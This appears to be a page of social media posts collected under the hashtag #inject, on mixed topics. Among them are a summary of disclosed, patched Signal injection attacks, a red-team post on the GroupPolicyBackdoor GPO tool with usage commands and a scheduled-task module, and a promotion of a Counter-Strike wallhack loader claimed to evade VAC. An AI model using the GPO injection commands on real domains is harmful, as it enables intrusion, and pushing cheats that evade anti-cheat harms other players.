[en] Signal #messenger: "two practical attacks that break the integrity properties of #Signal in its advertised #threat model" - Patched

Paper #ETHZ

"... protocol for resolving identities based on usernames and on phone numbers introduced a #vulnerability that allows a malicious server to inject arbitrary messages into one-to-one conversations under specific circumstances"

"The second #attack is even more severe. It arises from Signal's Sealed Sender (SSS) feature, designed to allow sender identities to be hidden ... a combination of two errors in the #SSS implementation in #Android allows a #malicious server to #inject arbitrary messages into both one-to-one and group conversations."

https://eprint.iacr.org/2026/484

#security #cryptology #encryption #e2e #chat #messaging
#ResearchHighlights

Signal Lost (Integrity): The Signal App is More than the Sum of its Protocols

Signal is a secure messaging app offering end-to-end security for pairwise and group communications. It has tens of millions of users, and has heavily influenced the design of other secure messaging apps (including WhatsApp). Signal has been heavily analysed and, as a result, is rightly regarded as setting the "gold standard" for messaging apps by the scientific community. We present two practical attacks that break the integrity properties of Signal in its advertised threat model. Each attack arises from different features of Signal that are poorly documented and have eluded formal security analyses. The first attack, affecting Android and Desktop, arises from Signal's introduction of identities based on usernames (instead of phone numbers) in early 2022. We show that the protocol for resolving identities based on usernames and on phone numbers introduced a vulnerability that allows a malicious server to inject arbitrary messages into one-to-one conversations under specific circumstances. The injection causes a user-visible alert about a change of safety numbers, but if the users compare their safety numbers, they will be correct. The second attack is even more severe. It arises from Signal's Sealed Sender (SSS) feature, designed to allow sender identities to be hidden. We show that a combination of two errors in the SSS implementation in Android allows a malicious server to inject arbitrary messages into both one-to-one and group conversations. The errors relate to missing key checks and the loss of context when cryptographic processing is distributed across multiple software components. The attack is undetectable by users and can be mounted at any time, without any preconditions. As far as we can tell, the vulnerability has been present since the introduction of SSS in 2018. We disclosed both attacks to Signal. The vulnerabilities were promptly acknowledged and patched: the first vulnerability was fixed two days after disclosure, while the second one was patched after eight days. Beyond presenting these devastating attacks on Signal's end-to-end security guarantees, we discuss more broadly what can be learned about the challenges of deploying new security features in complex software projects.

IACR Cryptology ePrint Archive
What if a #doctor could #inject an electricity-conducting liquid into the body, let it temporarily solidify to record #nerve signals or jump-start healing, and then return it to liquid form for easy removal?
#MaterialScience #Hydrogel #sflorg
https://www.sflorg.com/2025/12/ms12052501.html
Soft Electronics That Shape-Shift

Researchers develop a first-of-its-kind conductive hydrogel that can switch between liquid and solid states

GroupPolicyBackdoor

#redteam #python #windows #gpo

Инструмент постэксплуатации для различных манипуляций с GPO. Написан на Python.
Впервые представлен на [DEFCON_33] (https://www.synacktiv.com/sites/default/files/2025-08/roland_becard_turning-your-active-directory-into-the-attackers-c2_slides.pdf)

Примеры:

#backup

```sh
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
```

#inject

```sh
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
```

Пример ini:

```ini
[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
```

Hans Meier 1312 (@[email protected])

@[email protected] @[email protected] - Any tool that can edit/extract/inject files from .trd images (ZX Spectrum BetaDisk) would be a decent start. - Software that can serve files to an Interface1 for ZX Spectrums. - Emulators for Pentagon/Scorpion/Evolution/Sprinter Clone variants (the later has a special MAME build that only exists for Windows).

Todon.eu
Wow! Headline from Time: “You Can Now #Inject Yourself With an #Alzheimer’s #Drug at Home.” https://time.com/7314266/alzheimers-drug-injectable-leqembi/
You Can Now Inject Yourself With an Alzheimer’s Drug at Home

The first approved treatment for Alzheimer’s now comes in an at-home kit.

Time

Dagger Hilt (Для начинающих)

Я являюсь разработчиком мобильных приложений с опытом уже более 3х лет! Я всегда разрабатываю мобильные приложения один - это требует моя работа. Но сегодня я хочу поделиться с Вами тем, что такое Dagger Hilt! Следите за мной в телеграм Dagger Hilt - это необходимый каждому инструмент, который упрощает в разы разработку мобильных приложений. Служит для внедрения зависимостей. В первую очередь он необходим тем, у кого в проекте есть множество классов, которые требуют реализации. Хотите чтоб за вас это сделал кто-то другой? Dagger Hilt к вашим услугам.

https://habr.com/ru/articles/848690/

#di #android #adnroid_studio #hilt #dagger #inject #гайды #гайд_для_разработчиков #гайдлайн #kotlin

Dagger Hilt (Для начинающих)

Я являюсь разработчиком мобильных приложений с опытом уже более 3х лет! Я всегда разрабатываю мобильные приложения один - это требует моя работа. Но сегодня я хочу поделиться с Вами тем, что такое...

Хабр

Osiris for #Counterstrike 2 is a #Wallhack which can't be banned by #VAC because it doesn't access Counterstrike's game features

#Exloader provides a safe way to #inject the latest version of the Osirirs #cheat into Counterstrike

The cheat provides ways to see enemies through walls and visualizes footsteps and more.

#ExLoader #Osiris #Counterstrike #CS2 #CS #Cheat #Cheats #Mod #Mods #Extension #Extensions

If you are interested in state-sponsored-hackers. You should also read how Ken Thompson injected a virus to a compiler.

https://wiki.c2.com/?TheKenThompsonHack

From the article: "Not only did his compiler know it was compiling the login function and inject a backdoor, but it also knew when it was compiling itself and injected the backdoor generator into the compiler it was creating. The source code for the compiler thereafter contains no evidence of either virus."

#kenthompson #hack #statesponsored #inject #virus #malware